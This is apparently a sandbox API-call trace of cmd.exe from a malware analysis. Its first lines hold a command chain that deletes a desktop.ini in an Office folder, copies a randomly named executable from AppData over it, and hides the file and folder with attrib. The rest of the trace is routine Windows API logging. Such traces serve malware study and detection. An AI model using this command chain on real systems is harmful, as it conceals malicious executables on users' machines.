\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"" [0162.478] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.478] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x381cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.478] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.478] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.478] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.478] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.478] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.478] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.478] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.478] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.478] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.478] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.478] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.478] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.479] GetEnvironmentStringsW () returned 0x3826b0* [0162.479] FreeEnvironmentStringsW (penv=0x3826b0) returned 1 [0162.479] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.479] GetEnvironmentVariableW (in: 
lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.479] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.479] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0162.479] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.479] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.479] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.479] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.479] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.479] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.479] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.479] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f790, lpFilePart=0x22f78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f78c*="Desktop") returned 0x18 [0162.479] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.479] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f50c | out: lpFindFileData=0x22f50c) returned 0x380d40 [0162.479] FindClose (in: hFindFile=0x380d40 | out: hFindFile=0x380d40) returned 1 [0162.480] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f50c | out: lpFindFileData=0x22f50c) returned 0x380d40 [0162.480] FindClose (in: hFindFile=0x380d40 | out: hFindFile=0x380d40) returned 1 [0162.480] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f50c | out: lpFindFileData=0x22f50c) returned 0x380d40 [0162.480] FindClose (in: hFindFile=0x380d40 | out: hFindFile=0x380d40) returned 1 [0162.480] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.480] SetCurrentDirectoryW 
(lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.480] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.480] GetEnvironmentStringsW () returned 0x380560* [0162.480] FreeEnvironmentStringsW (penv=0x380560) returned 1 [0162.480] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.481] GetConsoleOutputCP () returned 0x1b5 [0162.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.481] GetUserDefaultLCID () returned 0x409 [0162.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.481] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f8d0, cchData=128 | out: lpLCData="0") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f8d0, cchData=128 | out: lpLCData="0") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f8d0, cchData=128 | out: lpLCData="1") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 
4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0162.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.482] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.483] GetConsoleTitleW (in: lpConsoleTitle=0x370b48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.483] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.483] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.483] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.484] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0162.484] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0162.484] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0162.484] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0162.485] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0162.485] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0162.485] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0162.487] _wcsicmp (_String1="del", _String2=")") returned 59 [0162.487] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0162.487] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0162.487] _wcsicmp (_String1="IF", _String2="del") returned 5 [0162.487] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0162.487] _wcsicmp (_String1="REM", _String2="del") returned 14 [0162.487] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0162.490] _wcsicmp (_String1="type", _String2=")") returned 75 [0162.490] _wcsicmp (_String1="FOR", 
_String2="type") returned -14 [0162.490] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0162.490] _wcsicmp (_String1="IF", _String2="type") returned -11 [0162.490] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0162.490] _wcsicmp (_String1="REM", _String2="type") returned -2 [0162.490] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0162.575] SetErrorMode (uMode=0x0) returned 0x0 [0162.575] SetErrorMode (uMode=0x1) returned 0x0 [0162.575] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x380618, lpFilePart=0x22f084 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f084*="Desktop") returned 0x18 [0162.575] SetErrorMode (uMode=0x0) returned 0x1 [0162.575] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.575] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0162.583] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.584] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0xffffffff [0162.585] GetLastError () returned 0x2 [0162.585] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0xffffffff [0162.585] GetLastError () returned 0x2 [0162.585] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0x382660 [0162.768] FindClose 
(in: hFindFile=0x382660 | out: hFindFile=0x382660) returned 1 [0162.769] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0xffffffff [0162.769] GetLastError () returned 0x2 [0162.769] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee00) returned 0x382660 [0162.769] FindClose (in: hFindFile=0x382660 | out: hFindFile=0x382660) returned 1 [0162.769] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0162.769] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0162.769] GetConsoleTitleW (in: lpConsoleTitle=0x22f2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.769] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f248 | out: lpAttributeList=0x22f180, lpSize=0x22f248) returned 1 [0162.769] UpdateProcThreadAttribute (in: lpAttributeList=0x22f180, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f240, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f180, lpPreviousValue=0x0) returned 1 [0162.770] GetStartupInfoW (in: lpStartupInfo=0x22f13c | out: lpStartupInfo=0x22f13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0162.770] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0162.771] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f228 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" ", lpProcessInformation=0x22f228*(hProcess=0x50, hThread=0x4c, dwProcessId=0x720, dwThreadId=0xfb4)) returned 1 [0162.875] CloseHandle (hObject=0x4c) returned 1 [0162.875] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0162.875] GetEnvironmentStringsW () returned 0x380b50* [0162.875] FreeEnvironmentStringsW (penv=0x380b50) returned 1 [0162.875] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0162.949] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22f11c | out: lpExitCode=0x22f11c*=0x0) returned 1 [0162.949] CloseHandle (hObject=0x50) returned 1 [0162.949] _vsnwprintf (in: _Buffer=0x22f264, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f128 | out: _Buffer="00000000") returned 8 [0162.949] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0162.949] GetEnvironmentStringsW () returned 0x382680* [0162.949] FreeEnvironmentStringsW (penv=0x382680) returned 1 [0162.949] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0162.949] GetEnvironmentStringsW () returned 0x382680* [0162.949] FreeEnvironmentStringsW (penv=0x382680) returned 1 [0162.949] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f180 | out: 
lpAttributeList=0x22f180) [0162.950] GetConsoleTitleW (in: lpConsoleTitle=0x22f500, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.950] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e578, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x22e57c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x22e578*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0162.952] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0162.952] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0162.952] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0162.952] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\desktop.ini")) returned 0xffffffff [0162.952] GetLastError () returned 0x2 [0162.952] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2010 [0162.952] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0162.952] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0162.952] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\desktop.ini")) returned 0xffffffff [0162.952] GetLastError () returned 0x2 [0162.952] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x38377c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x38377c) returned 0xffffffff [0162.953] GetLastError () returned 0x2 [0162.953] _get_osfhandle (_FileHandle=2) returned 0xb [0162.953] 
GetFileType (hFile=0xb) returned 0x2 [0162.953] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0162.953] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22ef78 | out: lpMode=0x22ef78) returned 1 [0162.953] _get_osfhandle (_FileHandle=2) returned 0xb [0162.953] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22efac | out: lpConsoleScreenBufferInfo=0x22efac) returned 1 [0162.954] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0162.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.954] GetFileType (hFile=0x7) returned 0x2 [0162.955] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0162.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f69c | out: lpMode=0x22f69c) returned 1 [0162.955] _dup (_FileHandle=1) returned 3 [0162.955] _close (_FileHandle=1) returned 0 [0162.955] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini", _String2="con") returned -53 [0162.955] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f66c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0162.956] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0162.956] GetConsoleTitleW (in: lpConsoleTitle=0x22f49c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.956] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x22f000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x22f000) returned 0x382810 [0162.956] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0162.956] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0162.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0162.956] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22df0c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0162.957] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0162.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.957] GetFileType (hFile=0x58) returned 0x1 [0162.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.957] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x22df64 | out: lpFileSizeHigh=0x22df64*=0x0) returned 0x7d600 [0162.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.957] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.957] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.957] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.958] GetFileType (hFile=0x50) returned 0x1 [0162.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.958] GetFileType (hFile=0x50) returned 0x1 [0162.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.958] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, 
lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] GetFileType (hFile=0x50) returned 0x1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] GetFileType (hFile=0x50) returned 0x1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] GetFileType (hFile=0x50) returned 0x1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] GetFileType (hFile=0x50) returned 0x1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.960] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, 
lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.961] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] GetFileType (hFile=0x50) returned 0x1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.961] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, 
lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] 